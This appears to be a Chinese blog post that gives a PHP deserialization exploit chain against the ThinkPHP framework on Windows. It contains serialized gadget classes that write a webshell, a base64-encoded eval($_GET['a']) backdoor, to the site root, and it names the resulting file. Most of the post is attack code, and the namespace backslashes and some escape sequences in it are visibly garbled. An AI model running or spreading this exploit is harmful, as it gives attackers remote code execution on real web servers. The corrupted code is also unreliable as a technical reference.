直接上exp吧,Windows下。
<?php
namespace thinkprocesspipes;
class Windows
{
private $files = [];
public function __construct()
{
$this->files = [new hinkmodelMerge];
}
}
namespace thinkmodel;
use thinkModel;
class Merge extends Model
{
protected $append = [];
protected $error;
public function __construct()
{
$this->append = [
'bb' => 'getError'
];
$this->error = (new hinkmodel
elationBelongsTo);
}
}
namespace think;
class Model{}
namespace thinkconsole;
class Output
{
protected $styles = [];
private $handle = null;
public function __construct()
{
$this->styles = ['removeWhereField'];
$this->handle = (new hinksessiondriverMemcache);
}
}
namespace thinkmodel
elation;
class BelongsTo
{
protected $query;
public function __construct()
{
$this->query = (new hinkconsoleOutput);
}
}
namespace thinksessiondriver;
class Memcache
{
protected $handler = null;
public function __construct()
{
$this->handler = (new hinkcachedriverMemcached);
}
}
namespace thinkcachedriver;
class File
{
protected $tag;
protected $options = [];
public function __construct()
{
$this->tag = false;
$this->options = [
'expire' => 3600,
'cache_subdir' => false,
'prefix' => '',
'data_compress' => false,
'path' => 'php://filter/convert.base64-decode/resource=./',
];
}
}
class Memcached
{
protected $tag;
protected $options = [];
protected $handler = null;
public function __construct()
{
$this->tag = true;
$this->options = [
'expire' => 0,
'prefix' => 'PD9waHAKZXZhbCgkX0dFVFsnYSddKTsKPz4',
];
$this->handler = (new File);
}
}
echo base64_encode(serialize(new hinkprocesspipesWindows));
会直接在根目录下生成一个shell。
名字:8fba8bb6410a4aee90b063a8b7e78b73.php
内容:
相对liunx 的exp有什么不同呢?
就是去:thinkphp/library/think/cache/driver/Memcached.php 类的 set 方法转了一圈。
利用的挺巧妙地。